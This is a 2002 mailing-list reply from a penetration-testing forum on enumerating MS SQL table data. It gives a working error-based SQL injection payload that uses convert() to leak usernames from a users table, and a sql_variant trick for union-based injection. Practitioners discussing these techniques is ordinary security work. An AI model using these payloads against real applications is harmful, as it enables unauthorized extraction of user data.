Penetration Testing mailing list archives
Re: sql table data enumeration help please.
From: "Deus, Attonbitus" <Thor () HammerofGod com>
Date: Fri, 10 May 2002 09:23:55 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 At 10:38 PM 5/9/2002, Kevin Spett wrote:
SELECT column must have the same data type. Try using the convert() hack to get around this whole issue, like this: username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM tblUsers WHERE Username > 'a')) + ''--
On a side note, MS SQL introduced the 'variant' datatype which will keep you from having to determine the actual column datatype by converting it for you as in: 'Union select convert(sql_variant,1),...' instead of 'union select 1,1,1,1...) Saves time for those in a hurry ;) AD -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPNv0G4hsmyD15h5gEQKZUQCg3gRzSKlqAOxVq7YYJ0bjESAaFDkAoLn0 8d8FuEPvTaC+7hXnDh/kAYPw =e28e -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- sql table data enumeration help please. Gary O'leary-Steele (May 09)
- Re: sql table data enumeration help please. Kevin Spett (May 10)
- Re: sql table data enumeration help please. Deus, Attonbitus (May 13)
- Re: sql table data enumeration help please. Kevin Spett (May 10)